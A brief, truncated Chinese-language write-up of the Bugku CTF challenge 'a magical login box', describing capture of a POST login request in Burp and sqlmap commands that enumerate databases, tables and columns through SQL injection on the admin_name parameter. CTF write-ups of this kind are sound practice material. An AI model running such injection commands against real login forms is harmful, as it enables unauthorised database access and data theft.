bugku-這是一個神奇的登陸框

打開http://123.206.87.240:9001/sql/後是個登陸界面 查看源代碼 於是考慮到sql注入,因爲是post,所以將burp的抓到的包保存到1.txt中,用sqlmap抓包 命令:sqlmap.py -r 1.txt -p admin_name --dbs//爆數據庫名 後續在保表、列以及數據 命令sqlmap.py -r 1.txt -p admin_name -D bug
相關文章
相關標籤/搜索